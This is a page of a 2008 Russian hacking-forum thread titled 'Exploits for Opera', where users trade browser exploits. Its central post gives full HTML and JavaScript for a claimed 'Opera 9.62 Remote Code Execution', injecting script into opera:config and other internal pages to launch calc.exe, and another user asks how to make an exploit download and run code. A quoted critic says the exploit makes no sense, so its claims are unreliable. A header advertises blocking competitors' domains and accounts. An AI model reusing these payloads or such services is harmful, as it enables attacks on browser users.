Эксплойты для Opera

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > Защита ОС: вирусы, антивирусы, файрволы.
Эксплойты для Opera

Страница 4 из 5

Опции темы

Поиск в этой теме

Опции просмотра

#31

31.10.2008, 12:08

.acme

Участник форума

Регистрация: 08.11.2007

Сообщений: 102

С нами: 9740547

Репутация: 93

на 9.61 не сработала. (win32)

#32

31.10.2008, 12:11

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

С нами: 9681386

Репутация: 2145

аналогично

#33

31.10.2008, 12:39

GlOFF

Постоянный

Регистрация: 08.05.2006

Сообщений: 816

С нами: 10531106

Репутация: 1338

Окно только что-то типо соответствия не найдено. ChaaK Может ты сделал только под свою машину? Давай оптимизируй под все

)

#34

31.10.2008, 12:43

~~DVD_RW~~

Banned

Регистрация: 27.04.2008

Сообщений: 683

С нами: 9495000

Репутация: 628

у мну включается калькулятор .. ток надо нажать Click me... и там всякие ерроры и обратно и калькулятор

#35

31.10.2008, 13:32

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

С нами: 10077446

Репутация: 3965

Цитата:

Окно только что-то типо соответствия не найдено. ChaaK Может ты сделал только под свою машину? Давай оптимизируй под все )

Бгг єт не чак нашел багу) см копирайты)

__________________

BlackHat.

MoDL

#36

31.10.2008, 14:07

satana8920

Постоянный

Регистрация: 22.09.2006

Сообщений: 531

С нами: 10333826

Репутация: 369

а как будет выглядеть сплойт еси надо че то подгрузить???и запустить
можт соберем побольше сплойтов для браузеров

Opera 9.62 Exploit

#37

02.11.2008, 18:13

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

С нами: 9752260

Репутация: 150

Opera 9.62 Exploit

OPERA 9.62 Remote Code Execution

Код:

<!--
# OPERA 9.62 Remote Code Execution
# Vulnerability Found By NeoCoderz
# Email : NeoCoderz1[at]msn[dot]com
-->
<html>
<script>
function execcalc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>
<script>
function execcalca() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>
<script>
function execcalcb() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>
<script>
function execcalcc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>
<script>
function execcalcd() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>
</html>

Потестить на себе можно тут
скачать:тут

#38

02.11.2008, 18:19

[Dezzter]

Участник форума

Регистрация: 26.11.2007

Сообщений: 266

С нами: 9714566

Репутация: 341

что позволяет уязвимость сделать на уязвимой тачке???

#39

02.11.2008, 18:20

~~_kREveDKo_~~

Banned

Регистрация: 04.12.2005

Сообщений: 826

С нами: 10754246

Репутация: 3813

Выполнение произвольноо кода, разве не видно? В примере вызывается калькулятор.

#40

02.11.2008, 18:22

astrologer

Постоянный

Регистрация: 30.08.2007

Сообщений: 773

С нами: 9840758

Репутация: 808

Цитата:

This presumed "exploit" just proves that "NeoCoderz" doesn't understand what the problem was, and trust me - his "exploit code" in fact makes no sense AT ALL. Seriously - he's trying to "inject" code that will simply eval() a string which is the path to calc.exe - as if that would automagically change Opera's preferences or make Opera throw that path at the system and execute it. Totally clueless. (He even claims his "exploit" is "injecting" this code into pages that do not accept any input - like opera:plugins and opera:about.

Источник.

Страница 4 из 5

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
несколько программ для работы с почтой - экстрактор e-mail адресов и спамер	sabotag	Уязвимости Mail-сервис	25	19.08.2017 22:35
Обзор новшеств в FreeBSD 7.0	zythar	Мировые новости. Обсуждения.	2	28.02.2008 12:43

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход